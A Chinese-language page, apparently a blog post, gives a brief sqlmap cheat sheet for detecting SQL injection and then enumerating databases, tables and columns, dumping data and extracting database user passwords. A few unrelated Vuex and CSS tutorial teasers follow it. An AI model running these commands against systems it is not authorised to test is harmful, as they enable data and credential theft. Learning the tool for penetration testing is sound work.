sqlmap是乙個自動化的sql注入工具,其主要功能是掃瞄、發現並利用給定url的sql注入漏洞,還可以檢測xss漏洞,內建了很多繞過的外掛程式,支援的資料庫有:mysql、oracle、postgresql、sqlserver、access、db2、sqlite、firebird、sybase和sap maxdb。sqlmap主要使用五種sql注入技術。
1、判斷是否有存在注入
sqlmap.py -u
2、判斷文字中的請求是否存在注入
sqlmap.py -r 1.txt # -r讀取檔案,檔案中存入請求頭
3、查詢當前使用者下的所有資料庫
sqlmap.py -u --dbs
4、獲取資料庫中的表名
sqlmap.py -u --d 庫名 --tables
5、獲取表中的欄位名
sqlmap.py -u --d 庫名 -t 表名 --columns
6、獲取字段內容
sqlmap.py -u --d 庫名 -t 表名 -c 欄位1,欄位2 --dump
7、獲取資料庫的所有使用者
sqlmap.py -u --users
8、獲取資料庫使用者的密碼
sqlmap.py -u --passwords
9、獲取當前**資料庫的名稱
sqlmap.py -u --current-db
10、獲取當前**資料庫的使用者名稱
sqlmap.py -u --current-user
Vuex的入門教程
前言 在 vue.js 的專案中,如果專案結構簡單,父子元件之間的資料傳遞可以使用 props 或者 emit 等方式,詳細點選這篇文章檢視。但是如果是大型專案,很多時候都需要在子元件之間傳遞資料,使用之前的方式就不太方便。vue 的狀態管理工具 vuex 完美的解決了這個問題。一 安裝並引入 vu...
CSS入門教程
css是 cascading style sheets 的簡稱,中文翻譯為 串接樣式表 也有人翻譯為 樣式表 css用以作為網頁的排版和風格設計,在web標準建站中,對css的熟悉和使用是相當重要的乙個內容。css的作用是彌補html的不足,讓網頁的設計更為靈活。這個文章只是為您介紹css的基礎應用...
CSS入門教程
css是 cascading style sheets 的簡稱,中文翻譯為 串接樣式表 也有人翻譯為 樣式表 css用以作為網頁的排版和風格設計,在web標準建站中,對css的熟悉和使用是相當重要的乙個內容。css的作用是彌補html的不足,讓網頁的設計更為靈活。這個文章只是為您介紹css的基礎應用...